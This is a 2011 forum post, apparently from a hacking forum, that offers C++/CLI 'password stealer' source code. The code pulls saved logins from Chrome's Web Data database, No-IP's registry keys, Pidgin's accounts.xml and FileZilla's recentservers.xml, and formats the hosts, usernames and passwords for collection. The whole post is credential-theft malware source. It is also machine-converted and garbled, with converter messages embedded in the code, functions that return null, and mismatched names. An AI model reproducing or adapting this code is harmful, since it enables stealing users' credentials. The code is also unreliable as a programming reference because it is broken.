[C++] Password Stealer Codes

slacker · Posted: 06-07-2011, 19:26:05 | Translate post to: ... (Click for more languages)

Google Chrome:

Code:

public:
void StealChrome()
{converted by Instant C++:
System::String ^cpass = System::String::empty;
System::String ^datapath = Environment::GetFolderPath(Environment::SpecialFolder::LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Web Data";
if (File::Exists(datapath))
{
SqlClient::SqlConnection ^SQLconnect = gcnew SqlClient::SqlConnection();
SqlClient::SqlCommand ^SQLcommand = nullptr;
SQLconnect->ConnectionString = "Data Source=" + datapath + ";";
SQLconnect->Open();
SQLcommand = SQLconnect->CreateCommand();
SQLcommand->CommandText = "SELECT * FROM logins";
SqlClient::SqlDataReader ^SQLreader = SQLcommand->ExecuteReader();
System::String ^host = nullptr;
System::String ^user = nullptr;
System::String ^pass = nullptr;
while (SQLreader->Read())
{
host = SQLreader["origin_url"];
user = SQLreader["username_value"];
pass = Decrypt(SQLreader["password_value"]);
if ((user != "") & (pass != ""))
{
pss->Text = host;
cpass = ("=============================" + System::Environment::NewLine + "Host: " + host + System::Environment::NewLine + "Username: " + user + System::Environment::NewLine + "Password: " + pass + System::Environment::NewLine + "=============================" + System::Environment::NewLine + " ");
}
}
delete SQLcommand;
SQLconnect->Close();
}

}
private:
[DllImport("Crypt32.dll", SetLastError=true, CharSet=System::Runtime::InteropServices::CharSet::Auto)]
static bool CryptUnprotectData(DATA_BLOB %pDataIn, System::String ^szDataDescr, DATA_BLOB %pOptionalEntropy, IntPtr pvReserved, CRYPTPROTECT_PROMPTSTRUCT %pPromptStruct, int dwFlags, DATA_BLOB %pDataOut);
[Flags()]
private enum class CryptProtectPromptFlags: int
{
CRYPTPROTECT_PROMPT_ON_UNPROTECT = 0X1,
CRYPTPROTECT_PROMPT_ON_PROTECT = 0X2
};
[StructLayout(LayoutKind::Sequential, CharSet=CharSet::Unicode)]
private value class CRYPTPROTECT_PROMPTSTRUCT
{
public:
int cbSize;
CryptProtectPromptFlags dwPromptFlags;
IntPtr hwndApp;
System::String ^szPrompt;
};
[StructLayout(LayoutKind::Sequential, CharSet=CharSet::Unicode)]
private value class DATA_BLOB
{
public:
int cbData;
IntPtr pbData;
};
public:
static System::String ^Decrypt(array<System::Byte> ^Datas)
{
DATA_BLOB inj = DATA_BLOB();
DATA_BLOB Ors = DATA_BLOB();
GCHandle Ghandle = GCHandle::Alloc(Datas, GCHandleType::Pinned);
inj.pbData = Ghandle.AddrOfPinnedObject();
inj.cbData = Datas->Length;
Ghandle.Free();
DATA_BLOB temppOptionalEntropy1 = DATA_BLOB();
CRYPTPROTECT_PROMPTSTRUCT temppPromptStruct2 = CRYPTPROTECT_PROMPTSTRUCT();
CryptUnprotectData(inj, nullptr, temppOptionalEntropy1, System::IntPtr::Zero, temppPromptStruct2, 0, Ors);
array<System::Byte> ^Returned = gcnew array<System::Byte>(Ors.cbData + 1);
Marshal::Copy(Ors.pbData, Returned, 0, Ors.cbData);
System::String ^TheString = Encoding::Default->GetString(Returned);
return TheString->Substring(0, TheString->Length - 1);
}
};

No-ip:

Code:

public:
System::String ^NoIPSteal()
{
IpRecord = nullptr;
System::String ^Username = Microsoft::Win32::Registry::GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC", "Username", nullptr);
System::String ^Password = Microsoft::Win32::Registry::GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC", "Password", nullptr);
System::String ^NL = System::Environment::NewLine;
IpRecord = "===========No-Ip=============" + NL + "Username : " + Username + System::Environment::NewLine + "Password : " + base64Decode(Password) + System::Environment::NewLine + "=============================" + NL;must return a value in C++:
return nullptr;
}
private:
System::String ^Base64Dec0de(System::String ^%Base64String)
{
static array<System::Byte> ^Enc = nullptr;
array<System::Byte> ^b = nullptr;
array<System::Byte> ^Out = nullptr;
int i = 0;
int j = 0;
int L = 0;
array<System::Byte> ^Dec = gcnew array<System::Byte>(256);
if (Enc->Length == 0) //byval 0&-Ptr = not initialized
{
Enc = System::Text::ASCIIEncoding::ASCII->GetBytes("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
}
for (i = 0; i <= 255; i++)
{
Dec[i] = 64;
}
for (i = 0; i <= 63; i++)
{
Dec[Enc[i]] = System::Convert::ToByte(i);
}
L = Base64String->Length;
b = System::Text::ASCIIEncoding::ASCII->GetBytes(Base64String);
Array::Resize(Out, (L / 4) * 3);
for (i = 0; i <= b->GetUpperBound(0); i += 4)
{
Out[j] = System::Convert::ToByte((Dec[b[i]] * 4) | (Dec[b[i + 1]] / 16));
j = j + 1;
Out[j] = System::Convert::ToByte(System::Convert::ToInt16(Dec[b[i + 1]] & 15) * 16 | (Dec[b[i + 2]] / 4));
j = j + 1;
Out[j] = System::Convert::ToByte(System::Convert::ToInt16(Dec[b[i + 2]] & 3) * 64 | Dec[b[i + 3]]);
j = j + 1;
}
if (b[L - 2] == 61)
{
j = 2;
}
else if (b[L - 1] == 61)
{
j = 1;
}
else
{
j = 0;
}
Array::Resize(Out, Out->GetUpperBound(0) - j + 1);
Base64Dec = System::Text::ASCIIEncoding::ASCII->GetString(Out);must return a value in C++:
return nullptr;
}

Pidgin:

Code:

public:
System::String ^PidginSteal()
{
System::String ^tempPidginSteal = nullptr;
XmlDocument ^ReadXML = gcnew XmlDocument();
int i = 0;
System::Object ^OutAll = nullptr;
tempPidginSteal = "";
System::String ^FilePath = Microsoft::VisualBasic::Interaction::Environ("appdata") + "\\.purple\\accounts.xml";
if (File::Exists(FilePath) != true)
{
return tempPidginSteal;
}
else
{
try
{
ReadXML->Load(FilePath);
XmlNodeList ^Protocol = ReadXML->GetElementsByTagName("protocol");
XmlNodeList ^Username = ReadXML->GetElementsByTagName("name");
XmlNodeList ^Password = ReadXML->GetElementsByTagName("password");
for (i = 0; i < Protocol->Count; i++)
{
OutAll = OutAll->ToString() + "============Pidgin===========" + System::Environment::NewLine + "Protocol: " + Protocol[i]->InnerText + "\r\n" + "Username: " + Username[i]->InnerText + "\r\n" + "Password: " + Password[i]->InnerText + "\r\n" + System::Environment::NewLine + "=============================" + System::Environment::NewLine;
}
tempPidginSteal = OutAll;
}
catch (Exception ^ex)
{
}
}
return tempPidginSteal;
}

Filezilla:

Code:

public:
System::String ^FileZillaSteal()
{
System::String ^FilePath = Microsoft::VisualBasic::Interaction::Environ("APPDATA") + "\\FileZilla\\recentservers.xml";
System::String ^FileBuffer = Microsoft::VisualBasic::Constants::vbNull;
System::String ^NL = System::Environment::NewLine;
FileBuffer = Microsoft::VisualBasic::FileIO::FileSystem::OpenTextFileReader(FilePath)::ReadToEnd();
System::String ^str = nullptr;
System::String ^Output = nullptr;
array<System::String^> ^TempData = nullptr;
TempData = FileBuffer->Split("\r\n");
FileBuffer = nullptr;
for each (System::String ^str in TempData)
{
if (str->Contains("</Host>"))
{
str->Replace("<Host>", "")->Replace("</Host>", "");
Output = Output + "Host : " + str + NL;
}
if (str->Contains("</User>"))
{
str->Replace("<User>", "")->Replace("</User>", "");
Output = Output + "Username : " + str + NL;
}
if (str->Contains("</Pass>"))
{
str->Replace("<Pass>", "")->Replace("</Pass>", "");
Output = Output + "Password : " + str + NL + NL;
}
}
Output = "=============FileZilla================" + System::Environment::NewLine + Output->Replace("<User>", "")->Replace("</User>", "")->Replace("<Host>", "")->Replace("</Host>", "")->Replace("<Pass>", "")->Replace("</Pass>", "") + System::Environment::NewLine + "=============FileZilla================" + System::Environment::NewLine;
ShoitZilla = Output;must return a value in C++:
return nullptr;
}

Sursa:www.info-hack.com